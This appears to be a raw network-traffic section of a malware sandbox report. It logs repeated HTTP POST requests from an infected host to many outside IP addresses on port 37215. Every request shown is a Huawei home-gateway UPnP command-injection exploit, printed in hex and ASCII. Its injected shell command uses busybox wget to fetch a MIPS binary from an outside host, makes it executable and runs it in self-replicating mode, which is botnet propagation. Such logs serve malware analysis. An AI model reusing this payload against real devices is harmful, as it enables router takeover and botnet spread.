                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.493464947 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    20192.168.2.1449564197.174.164.18237215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.104423046 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.493464947 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    21192.168.2.1460784157.241.125.7437215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.105153084 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.464147091 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    22192.168.2.145777441.174.151.3237215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.105153084 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.476092100 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    23192.168.2.1441414157.26.3.22537215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.105619907 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.500138998 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    24192.168.2.143469695.51.118.1437215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.105619907 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.500138998 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
